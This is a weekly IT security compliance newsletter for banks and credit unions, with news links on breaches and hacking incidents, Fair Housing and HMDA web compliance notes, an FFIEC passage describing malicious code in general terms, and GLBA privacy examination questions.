Spending less than 5 minutes a week along with a cup of coffee, you can monitor your IT security as required by the FDIC, OCC, FRB FFIEC, NCUA, NIST, GLBA, HIPAA, and IT best practices.  For more information visit http://www.yennik.com/it-review/.

REMINDER - This newsletter is available for the Android smart phones and tablets.  Go to the Market Store and search for yennik.

FYI - Can the cloud be safe for banks? - Consider the issues at stake for the banking industry to implement cloud technology. Here are some of the possibilities for this security-sensitive industry. http://www.techrepublic.com/blog/datacenter/can-the-cloud-be-safe-for-banks/5197?tag=nl.e101

FYI - Spies get bonuses to halt Google poachers who pay three times as much as GCHQ - Spies working at the Government’s communications headquarters are being offered bonuses worth tens of thousands of pounds to stop them being poached by corporate giants such as Microsoft and Google. http://www.dailymail.co.uk/news/article-2080841/Spies-bonuses-halt-Google-poachers-pay-times-GCHQ.html

FYI - NIST Protects BIOS With New Security Guidelines - The standards body provides ways to detect changes to the code or configuration of a PC's startup system. The organization that sets federal technology standards has provided new security guidelines for protecting the system that starts up PCs. http://www.informationweek.com/news/government/security/232301025

FYI - GAO - National Credit Union Administration: Earlier Actions Are Needed to Better Address Troubled Credit Unions. http://www.gao.gov/products/GAO-12-247

FYI - Vulnerability allows brute force hacking of wireleless routers - A computing standard than enables users to easily stand up an encrypted wireless network suffers from a design weakness that could enable attackers to gain router access, according to US-CERT. http://www.scmagazine.com/vulnerability-allows-brute-force-hacking-of-wireleless-routers/article/221016/

FYI - Credit Mutuel Units Inspected by French Data Protection Watchdog - Two Credit Mutuel-CIC units were inspected by France’s data protection authority following a data system failure reported on Dec. 28 by weekly newspaper Canard Enchaine, the Paris-based watchdog said today. http://www.bloomberg.com/news/2012-01-02/credit-mutuel-units-inspected-by-french-data-protection-watchdog.html

FYI - UK Police Fired Over 'Inappropriate' Facebook Behavior - Cops aren't above the law when it comes to their behavior on Facebook. Nearly 200 police officers in the United Kingdom have received official disciplinary action for posting inappropriate photos or comments, including racist slurs, on Facebook. http://www.securitynewsdaily.com/uk-police-inappropriate-facebook-behavior-1456/

ATTACKS, INTRUSIONS, DATA THEFT & LOSS

FYI - Stratfor keeps website offline after hack - Security intelligence firm Stratfor has warned subscribers that its website could stay offline for a week or more.
http://www.zdnet.co.uk/blogs/mapping-babel-10017967/stratfor-keeps-website-offline-after-hack-10025103/
http://www.bbc.co.uk/news/technology-16352891

FYI - Hacking group releases more Stratfor subscriber data - The data dump includes 75,000 names and addresses of subscribers to the analysis service - Hackers released another batch of data on Thursday pilfered from Stratfor Global Intelligence, a widely used research and analysis company whose website was attacked last weekend. http://www.computerworld.com/s/article/9223082/Hacking_group_releases_more_Stratfor_subscriber_data?taxonomyId=17

FYI - Aggressive Phishing Attack Targets Military Personnel - Emails containing malware, which appear to come from senior officers or legit companies, have been sent to military personnel during the holiday season. The U.S. military received an unwanted present this Christmas holiday season in the form of an "aggressive" phishing attack that's been making the rounds of .mil email accounts, according to the Army. http://www.informationweek.com/news/government/security/232301104

FYI - Cyber Threat to Power Grid Puts Utility Investors at Risk - The electric-utility industry’s concerns about cyber security has escalated sufficiently for several investor-owned utilities to include cyber-attacks as a material risk factor in recent filings with the U.S. Securities and Exchange Commission. http://www.forbes.com/sites/williampentland/2011/12/27/cyber-threat-to-power-grid-puts-utility-investors-at-risk/

FYI - Gordon Brown's Downing Street emails 'hacked' - Computer crime by press may be as widespread as phone scandal - Police investigating computer hacking by private investigators commissioned by national newspapers have uncovered evidence that emails sent and received by Gordon Brown during his time as Chancellor were illegally accessed. http://www.independent.co.uk/news/uk/crime/gordon-browns-downing-street-emails-hacked-6283985.html

FYI - Hackers Expose Details of 15,000 Israeli Credit Cards on Web - Details from 15,000 Israeli credit card customers have been exposed by hackers on the Internet, the Bank of Israel said. http://www.businessweek.com/news/2012-01-04/hackers-expose-details-of-15-000-israeli-credit-cards-on-web.html

FYI - United flyer finds dozens of passengers' info online - Anna just wanted to check her miles on United Airline's mobile website, but instead, she ended up with a whole lot more. http://www.kvue.com/news/United-Passenger-Finds-dozens-of-account-passengers-info-online--136455568.html

FYI - California union latest Anonymous police victim - Anonymous hackers affiliated with the group's "AntiSec" initiative stuck again over the New Year's weekend, this time dumping private data they stole by breaking into the website belonging to the California Statewide Law Enforcement Association (CSLEA) union. http://www.scmagazine.com/california-union-latest-anonymous-police-victim/article/221643/?DCMP=EMC-SCUS_Newswire

Return to the top of the newsletter

WEB SITE COMPLIANCE - Fair Housing Act

A financial institution that advertises on-line credit products that are subject to the Fair Housing Act must display the Equal Housing Lender logotype and legend or other permissible disclosure of its nondiscrimination policy if required by rules of the institution's regulator.

Home Mortgage Disclosure Act (Regulation C)

The regulations clarify that applications accepted through electronic media with a video component (the financial institution has the ability to see the applicant) must be treated as "in person" applications. Accordingly, information about these applicants' race or national origin and sex must be collected. An institution that accepts applications through electronic media without a video component, for example, the Internet or facsimile, may treat the applications as received by mail.

Return to the top of the newsletter
 
INFORMATION TECHNOLOGY SECURITY -  We continue our series on the FFIEC interagency Information Security Booklet.  

MALICIOUS CODE

Malicious code is any program that acts in unexpected and potentially damaging ways. Common types of malicious code are viruses, worms, and Trojan horses. The functions of each were once mutually exclusive; however, developers combined functions to create more powerful malicious code. Currently malicious code can replicate itself within a computer and transmit itself between computers. Malicious code also can change, delete, or insert data, transmit data outside the institution, and insert backdoors into institution systems. Malicious code can attack institutions at either the server or the client level. It can also attack routers, switches, and other parts of the institution infrastructure. Malicious code can also monitor users in many ways, such as logging keystrokes, and transmitting screenshots to the attacker.

Typically malicious code is mobile, using e - mail, Instant Messenger, and other peer-to-peer (P2P) applications, or active content attached to Web pages as transmission mechanisms. The code also can be hidden in programs that are downloaded from the Internet or brought into the institution on diskette. At times, the malicious code can be created on the institution's systems either by intruders or by authorized users. The code can also be introduced to a Web server in numerous ways, such as entering the code in a response form on a Web page.

Malicious code does not have to be targeted at the institution to damage the institution's systems or steal the institution's data. Most malicious code is general in application, potentially affecting all Internet users with whatever operating system or application the code needs to function.

Return to the top of the newsletter

INTERNET PRIVACY - We continue our series listing the regulatory-privacy examination questions.  When you answer the question each week, you will help ensure compliance with the privacy regulations.

Sharing nonpublic personal information with nonaffiliated third parties only under Sections 14 and/or 15.

Note: This module applies only to customers.

A. Disclosure of Nonpublic Personal Information

1)  Select a sample of third party relationships with nonaffiliated third parties and obtain a sample of data shared between the institution and the third party.

a.  Compare the data shared and with whom the data were shared to ensure that the institution accurately states its information sharing practices and is not sharing nonpublic personal information outside the exceptions. 

B. Presentation, Content, and Delivery of Privacy Notices

1)  Obtain and review the financial institution's initial and annual notices, as well as any simplified notice that the institution may use. Note that the institution may only use the simplified notice when it does not also share nonpublic personal information with affiliates outside of Section 14 and 15 exceptions. Determine whether or not these notices: 

a.  Are clear and conspicuous (§§3(b), 4(a), 5(a)(1));

b.  Accurately reflect the policies and practices used by the institution (§§4(a), 5(a)(1)). Note, this includes practices disclosed in the notices that exceed regulatory requirements; and

c.  Include, and adequately describe, all required items of information (§6).

2)  Through discussions with management, review of the institution's policies and procedures, and a sample of electronic or written customer records where available, determine if the institution has adequate procedures in place to provide notices to customers, as appropriate. Assess the following:

a)  Timeliness of delivery (§§4(a), 4(d), 4(e), 5(a)); and

b.  Reasonableness of the method of delivery (e.g., by hand; by mail; electronically, if the customer agrees; or as a necessary step of a transaction) (§9) and accessibility of or ability to retain the notice (§9(e)).